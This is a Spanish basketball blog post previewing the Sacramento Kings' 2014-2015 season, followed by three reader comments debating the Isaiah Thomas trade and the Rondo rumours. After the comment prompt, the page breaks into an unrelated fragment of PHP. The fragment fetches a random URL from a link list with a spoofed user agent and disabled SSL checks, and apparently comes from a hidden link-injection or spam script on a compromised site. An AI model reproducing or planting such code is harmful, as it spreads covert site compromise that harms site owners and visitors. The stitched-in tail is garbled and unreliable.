Sacramento Kings 2014-2015: Talento sin control

25 de October de 2014 por Sancho88

Se ha creado una dinámica muy viciosa y difícil de revertir en la capital de California. Sacramento comienza su novena temporada sin oler eliminatorias por el título y la reconstrucción va camino de convertirse en una urbanización ‘fantasma’ a las afueras de la ciudad. Ranadivé tiene mucha ilusión y mucha pasta metida en este proyecto, pero poca base para creer en ellos. DeMarcus Cousins comienza su contrato multianual por el que cobrará 61 millones hasta 2018 y es el hombre franquicia de los morados. Junto a él parece que ha encontrado su rumbo en la liga Rudy Gay. No obstante, su contrato expira el próximo verano y si no ve resultados a corto plazo lo más probable es que coja las maletas y se largue del avispero. La esperanza de los Kings pasa por que sus hombres de oro formen una sociedad indivisible y alguien decida ayudarles en defensa. Como esto último requiere un trabajo de fondo desarrollado durante varias temporadas y Sacramento no ha sido ese lugar de trabajo, los Kings serán un año más los ‘agitatoallas’ del Oeste.

Movimientos clave

La salida de Isaiah Thomas a los Phoenix Suns es el movimiento más estúpido que han hecho los Kings en mucho tiempo. No fueron motivos profesionales, sino estrictamente económicos. El único objetivo de los Kings durante el verano ha sido evitar el impuesto de lujo. Con los 7,2 millones de Thomas es verdad que se metían por los pelos en los temidos impuestos, pero es ridículo regalar una joya con esa proyección para traer a cambio dos jugadores de rotación como Darren Collison (Clippers) y Ramon Sessions (Bucks). Con este movimiento además se ve cortada la progresión de Ray McCallum, que pasa de ser la segunda opción como base a convertirse en un jugador totalmente residual. Por otra parte, también fue muy criticada la elección del draft Nik Stauskas con el pick 8. El escolta de los Wolverines recuerda ligeramente a una leyenda como Peja Stojakovic, y eso siempre tiene su encanto, pero estamos hablando del mejor draft de los últimos tiempos. Un jugador como Elfryd Payton les habría ido fenomenal para empezar a enderezar la dirección del equipo. Solo convence la vuelta de Omri Casspi (ex Pelicans), que vuelve mucho más maduro que en su primer año en la liga. Será un buen complemento para Rudy Gay en el puesto de alero. Por último, también han conseguido traer a Ryan Hollins desde los Clippers. Puede ser el señuelo defensivo que necesita el equipo para acompañar a Cousins. En el apartado de bajas se deshicieron de bastantes jugadores que ni siquiera llegaron a debutar con el equipo: Jason Terry, Alonzo Gee, Jeremy Tyler, Sim Bhullar, Deonte Burton y Wayne Ellington. Y también de Aaron Gray, Willie Reed, Travis Outlaw y Quincy Acy. Todo esto para no pasarse del impuesto de lujo. Mucho ruido y pocas nueces y una gestión muy mediocre de Pete D’Alessandro.

demarcus cousins

Qué esperamos de ellos

Mike Malone quiere conseguir convertir el juego del equipo en algo más armónico y ordenado que el año pasado. Para él la salida de Thomas representa un cambio de mentalidad, e incluso Cousins ha dicho que la pelota va a fluir más en ataque con Collison como director del equipo. Pero ahí no está el problema de estos Kings. El problema empieza atrás, donde son el equipo de la liga que más triples permite del rival. No hay ayudas atrás y es evidente que por ese motivo no hay ninguna solidaridad en el ataque y cada uno hace la guerra por su lado. Este año no esperamos nada nuevo bajo el sol. Han llegado jugadores que no quiere nadie para acompañar a Cousins y Gay en un proyecto que ni ellos mismos saben adónde va. Con esos mimbres muy poquito podemos esperar de los Kings. Más estancamiento, nula imaginación en el ataque, imposibilidad de resolver partidos ajustados y una defensa mediocre. Esto ocurrirá así. Solo se espera un salto cualitativo importante de Ben McLemore, un jugador que realmente puede ser la tercera referencia del equipo y que te hace crecer desde atrás, pero que el año pasado no tuvo ninguna confianza por parte de su entrenador. Por tanto, esperamos una dirección plana y sin imaginación para resolver, más protagonismo de McLemore, la aportación de Gay y Cousins como el año pasado y un acompañante en la zona para DeMarcus que va a cambiar partido tras partido. Ni Landry, ni Thompson ni Williams son jugadores compatibles con el jugador estrella, porque no le van a hacer tareas sucias atrás. Reggie Evans y Hollins sí pueden hacer ese trabajo, y Malone se tendría que dar cuenta de esto. El futuro de los Kings pasa por reconvertir a Cousins como ala-pívot. Además, es casi seguro que veremos esta temporada a Landry, Thompson o Derrick Williams partir hacia otro lugar. Son jugadores totalmente incompatibles con Cousins y con contratos muy caros. Rajon Rondo es el sueño húmedo de la franquicia. Para él sería la pesadilla, pero los Kings lo quieren a toda costa, y seguramente podrían traerlo a cambio de alguno de estos jugadores más alguna futura ronda del draft.

Pronóstico

30-52. Lo mismo de todos los años. El equipo no da para más, está en una fase de estancamiento clara que solo se puede solucionar con un traspaso gordo.

Plantilla

PG: Darren Collison, Ramon Sessions, Ray McCallum
SG: Ben McLemore, Nik Stauskas, Trey Johnson
SF: Rudy Gay, Omri Casspi, Derrick Williams
PF: Carl Landry, Jason Thompson, Reggie Evans, Eric Moreland
C: DeMarcus Cousins, Ryan Hollins

Bajas: Isaiah Thomas, Jason Terry, Alonzo Gee, Wayne Ellington, Jeremy Tyler, Deonte Burton, Willie Reed, Aaron Gray, Quincy Acy, Travis Outlaw

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Gran análisis.
    Yo no veo paso atrás. Creo que se ha fichado bien en líneas generales. Otra cosa es que es una lástima haber soltado a Thomas justo ahora que había explotado, pero tanto Collison como Sessions vienen de jugar muy bien y estar muy bien considerados en la liga. Quizá por ahí se pierde un poco, pero el resto de fichajes mejoran lo que había.
    Si el oeste no fuera el oeste estoy seguro que podían subir unas 10 victorias fácil. Hay variables que no conozco, no sigo tanto a los Kings como tú… pero mi instinto me dice que pueden empezar a ser competitivos desde ya.

      Citar

  2. Denise dice:
    #2

    El problema de los Kings ya no es solo por las decisiones de este verano, viene de más atrás, en especial por las cagadas que han hecho en los últimos años en el Draft. Obviamente es facil hablar a toro pasado, pero las elecciones en 2011 de Biyombo en el pick 7 (y la posterior adquisición de Fredette), y la de 2012 de Thomas Robinson en el pick 5 los han matado.
    La del año pasado con McLemore..bueno, no era mal prospecto ya que dos meses antes del Draft era el candidato nº1; y este año pues creo que la han vuelto a cagar con Stauskas. Hay que darle tiempo, pero creo que había mejores opciones. Si tal como comenta Sancho, los Kings querían a Rondo, pues deberían haber ofrecido su pick 8 más quitarse de en medio alguno de los 3 contratos basura que tienen con dos jugadores mediocres como Derrick Williams, Carl Landry y Jason Thompson. Aunque el actual Rondo tampoco creo que es lo que necesitan los Kings.

    Respecto a lo de los bases, Collison y Sessions me parecen una muy buena pareja de bases, y aunque es verdad que Isaiah Thomas se marcó el año pasado un temporadón, dudo mucho que vuelva a repetirlo, me parece uno de esos jugadores tipo Aaron Brooks de hacer un par de años cojonudos y luego diluirse como un azucarillo.

    Por tanto, el futuro es muy gris para los Kings, jugar en el Oeste es muy chungo, y con Rudy Gay siendo expirings, 3 contratos basura y dos jovenes (McLemore y Stauskas) con muchas dudas sobre su importancia en la liga, me temo que el GM tiene mucho trabajo. Quizá lo primero que debiera hacer es traspasar a Gay y pillar algo a cambio antes de que se vaya gratis.

      Citar

  3. Sancho88 dice:
    #3

    Isaiah Thomas va a tener que demostrar siempre que su pick 60 y su pequeño cuerpo no son hándicaps para triunfar en esta liga. Yo estoy convencido que no es un base del montón, que no es Aaron Brooks y que no es un jugador microhondas a los Nate Robinson como mucha gente cree. Sabéis que me veo casi todos los partidos de los Kings, y este chico es un jugador muy especial. No sé cómo le han dejado marchar. No tiene caché y probablemente nunca lo tendrá, y creo que es el base más subestimado de la liga, pero es muy bueno. Nunca nadie sabe qué pasará con la carrera de un jugador, pero creo que Thomas no es ese perfil de jugador que hace una gran temporada y luego se borra. En la preseason sigue demostrando lo jugón que es, y ahora le toca salir desde el banquillo en Phoenix, lo que no significa que no esté capacitado para ser titular. Dejarlo marchar es un pecado.

    Sobre Rondo ya han intentado traerlo varias veces, y Boston es muy duro negociando por él. Pusieron sobre la mesa Thomas+McLemore, y luego también la primera del 2013 y Boston siempre se negó. Obviamente que haría crecer mucho a estos Kings en identidad y defensa, que es lo que les falta. Pero como ya digo son sueños húmedos, un tío del caché de Rondo jamás va a jugar en un equipo como los Kings

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>